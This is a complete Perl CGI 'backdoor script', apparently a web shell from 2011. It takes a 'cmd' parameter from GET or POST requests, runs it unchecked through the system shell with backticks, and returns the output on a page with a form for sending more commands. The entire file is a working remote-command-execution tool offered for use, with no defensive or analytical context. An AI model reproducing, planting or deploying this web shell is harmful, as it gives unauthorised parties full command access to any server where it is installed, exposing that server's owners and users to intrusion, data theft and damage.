#!/usr/local/bin/perl
# ==============================================================
# CGI backdoor script.
#
# Author: Matthew William Coan
# Date: Thu Dec 29 17:56:29 EST 2011
# ==============================================================

print "Content-type: text/html\r\n\r\n";

$request_method = $ENV{'REQUEST_METHOD'};

if($request_method eq "GET") {
   $query_string = $ENV{'QUERY_STRING'};
   $content_length = length($query_string);
}
elsif($request_method eq "POST") {
   $content_length = $ENV{'CONTENT_LENGTH'} + 0;
   $query_string = "";
   read(STDIN, $query_string, $content_length);
}

@name_and_value_array = split("\&", $query_string);

%param_map = ();

foreach my $name_and_value (@name_and_value_array) {
   @temp = split("=", $name_and_value);
   $name = $temp[0];
   $name =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
   $name =~ s/\+/ /g;
   $value = $temp[1];
   $value =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
   $value =~ s/\+/ /g;
   $param_map{$name} = $value;
}

$cmd = $param_map{"cmd"};

$result = "";

if($cmd ne "") {
   $result = `$cmd`;
}

print<<EOT;
<html>
<head>
<title>Backdoor Script...</title>
</head>
<body bgcolor="black">
<font color="green" face="Courier">
<h1>
Backdoor Script...
</h1>
<hr>
<br>
Command Output:</b>
<br>
<br>
<hr>
<pre>
$result
</pre>
<br>
<hr>
<br>
Run a command:<br>
<form method="POST" action="/cgi-bin/backdoor.cgi">
Command: <input type="text" name="cmd"><br>
<input type="submit"> * <input type="reset">
<br>
<br>
</form>
</font>
</body>
</html>
EOT